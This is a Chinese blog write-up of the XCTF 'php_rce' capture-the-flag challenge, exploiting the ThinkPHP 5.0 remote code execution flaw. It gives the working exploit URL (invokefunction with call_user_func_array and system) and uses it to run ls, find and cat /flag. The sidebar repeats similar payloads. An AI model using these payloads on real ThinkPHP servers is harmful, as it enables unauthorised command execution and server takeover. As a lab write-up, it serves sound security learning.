XCTF-攻防世界CTF平台-Web类——3、php_rce(ThinkPHP V5.0框架远程代码执行漏洞)

最新推荐文章于 2023-05-22 09:44:52 发布
最新推荐文章于 2023-05-22 09:44:52 发布
阅读量987 收藏 7
点赞数 3
分类专栏: # Bugku、XCTF-WEB类写题过程 文章标签: php thinkphp 远程命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Onlyone_1314/article/details/120038093
版权

先访问题目场景:
在这里插入图片描述

主页提示我们:网页使用的是ThinkPHP框架,版本为5.0
这道题主要是考察:ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本。
攻击的exp是:http://111.200.241.244:61059/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
在这里插入图片描述
通过s就可以获取路由信息,程序未对控制器进行过滤,导致攻击者可以用 \(反斜杠)调用任意类方法。其中:

  1. index/是对应的模块
  2. \think\app 以反斜线开头,这就是我们想要实例化的类
  3. /invokefunction是让\think\app类想要调用的方法,
  4. function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1是对应invokefunction的参数。

对于选用invokefunction这个函数,是因为它是个反射函数,可以方便的调用任何函数。
关于如何解析把function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1这些解析成invokefuncition参数的,可以看下Request.php 对应的param函数。
需要注意的是不同版本的ThinkPHP,对应的文件、类名有些差异。当然还有很多的攻击方式,只要你去文件找到可以实例化的类构造相应的payload就行。

运行shell命令ls查看当前目录下的文件:http://111.200.241.244:61059/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
在这里插入图片描述
可以看到当前目录下的文件
查找根目录下的文件:http://111.200.241.244:61059/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /
参数/是根目录的意思,这表示显示根目录下的文件:
在这里插入图片描述
也可以使用find命令查找flag:

find / -name flag

或者

find / -name '*flag'

攻击:http://111.200.241.244:61059/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name flag
在这里插入图片描述
都可以找到flag文件所在的位置
之后使用cat命令查看/flag文件内容:

cat /flag

攻击:http://111.200.241.244:61059/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
在这里插入图片描述
得到flag:flag{thinkphp5_rce}

大灬白
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF-RE】新手练习区-Hello, CTF.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/gisa2b
网络攻防路6-xctf php_rce
大紫明宫空离境
11-15 192
目录 一 ,php_rce 二,解题 三 ,总结 一 ,php_rce 这事一道PHP远程代码执行漏洞题,RCE全称remote code execution,翻译成中文就是远程代码执行。是指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。 二,解题 1 进入试题 2 访问http://220.249.52.133:38152/index.ph
XCTF中高阶webphp_rce
帅醉了的博客
03-14 208
payload为 /?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27 解析: 1.当$name以反斜线开始时会直接将其作为的命名空间路径。 2....
ctf攻防世界 WEB题:php_rce
qq_30889301的博客
05-09 877
ThinkPHP是一个基于PHP语言的开源Web应用框架,它提供了一系列的工具和组件,可以帮助开发人员更快速、更高效地构建Web应用程序。ThinkPHP框架具有简单易用、高效稳定、安全可靠等特点,被广泛应用于各种Web应用程序的开发中。对于thinkphp框架Github上有一个专用的漏洞验证工具:https://github.com/zangcc/Aazhen-v3.1。进入靶场后会看到以下内容,非常直观的说明了自己是thinkphp框架。此工具已经给一个可用的url案例,我们只需要更改就可以了。
XCTF-高手进阶区:php_rce
1stPeak's Blog
03-02 1314
题目: 看到题目就知道是thinkphp远程执行漏洞 payload: index.php默认的话可以不需要 index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php代码 注:代码后面可不加分号 获得flag: index....
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象protected $append = [];// $value值,作为call函数引用的第二变量p
ctf中常见php rce绕过总结
2302_76827504的博客
04-28 1945
只是总结一些常见的姿势,大佬轻喷。
ctf web方向与php学习记录20之RCE初见
这周末在做梦的博客
10-16 451
一,RCE是什么? 1定义:RCE(remote command/code execute)远程代码执行,是互联网的一种安全漏洞。 2分 (1)远程命令执行ping (2)远程代码执行evel。 3漏洞出现的原因 没有在输入口做输入处理。 注意:由于传入的必须是有效的 PHP 代码,所有的语句必须以分号结尾。 二,ctfhub——eval执行执行 url+/?cmd=passthru(“ls”);或 url+/?cmd=system(“ls”);后无有效信息。 然后输入 url+/?cmd=passt
CTF | 网络安全】攻防世界 php_rce 解题详析
等风来
05-22 5117
[CTF/网络安全] 攻防世界 php_rce 解题详析
BUUCTF-thinkPHP5 RCE
朋克归零膏的博客
10-12 404
real题目我认为getflag是没意义的,幸运的是能从中学到一些技巧。在用大佬的poc对比官方的poc有一个细节。这题在尝试用命令执行写一句话的时候发现输入。,因此思路应该是将一句话分成两段然后拼一起。会被替换成空字符但是能单独写。
XCTF-Mobile】新手练习区-08-app3.rar
08-30
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5087&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/app3
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF攻防世界web.doc
09-19
X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 【目标】 学会查看源代码 【工具】 firefox浏览器 【分析过程】 可以通过view-source:的方法来访问源码:...
XCTF-2019-tfboys:XCTF 2019最终网络任务“ tfboys”的源代码
05-18
XCTF-2019-tfboys tfboys又名TensorFlow Boys 部署(Python3) pip install -r requirements.txt cd web3 python run.py 迪尔斯 web3/model/default/ : pre-trained LSTM model. exploit/exploit.ipynb : codes...
XCTF系列 // Web | php_rce & Web_python_template_injection
qq_45805420的博客
07-26 230
前言 这两题涉及到的知识点有,ThinkPHP远程代码执行漏洞 以及 flask的 SSTI 漏洞(服务端模板注入) 。   由于水平有限,关于以上内容的了解均只到表面,具体漏洞原理尚未看明白,详细分析只好以后再补,在这里先参照网上的 writeup,照猫画虎,略微整理分析一下解题思路与流程。 1` php_rce ThinkPHP 是一个轻量级国产 PHP 开发框架,它可以支持 windows/Unix/Linux 等服务器环境。在 ThinkPHP 5 中出现了由于变量覆盖而引起的 RCE远程命令
攻防世界XCTFphp_rce
末初的CSDN博客
03-13 3619
漏洞预警: https://help.aliyun.com/noticelist/articleid/1000081331.html?spm=5176.2020520001.1004.7.2e874bd363uLuf 漏洞描述: 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接GetWebShell。 影响版本: Think...
Web开发 | ThinkPHP 3.2.3 - 05.命名空间与多语言
JasonSen
04-12 385
1.前台注册完善   数据库中不能存储数组的信息,所以在上篇文章末尾的user_hobby是无法存入数据库中的。   可以使用implode()方法把数组元素用逗号合并起来,变成字符串。 程序代码如下: function register(){ $user = new \Model\UserModel(); //判断表单是否提交 ...
XCTF php_rce
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-31 591
ThinkPHP 5.X远程命令执行漏洞 利用system函数远程命令执行 ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 写入shell ?s=/index/\think\app/invokefunction&funct...
Ctfshow web入门 thinkphp专题
feng的博客
04-25 3187
web569 看一下thinkphp3.2.3官方手册,看完就都懂了: ThinkPHP3.2.3完全开发手册 首先就是路由的方式: http://serverName/index.php/模块/控制器/操作 此外就是默认是不区分大小写的,由'URL_CASE_INSENSITIVE' => true,这个配置决定。 URL模式的话,默认是PATHINFO模式,即本题考察的模式。 直接访问即可: /index.php/admin/login/ctfshowlogin web570 下载源码,在C
攻防世界upload1
最新发布
07-28
- *2* *3* [XCTF-攻防世界CTF平台-Web——11、upload1(文件上传、前端校验)](https://blog.csdn.net/Onlyone_1314/article/details/121503130)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值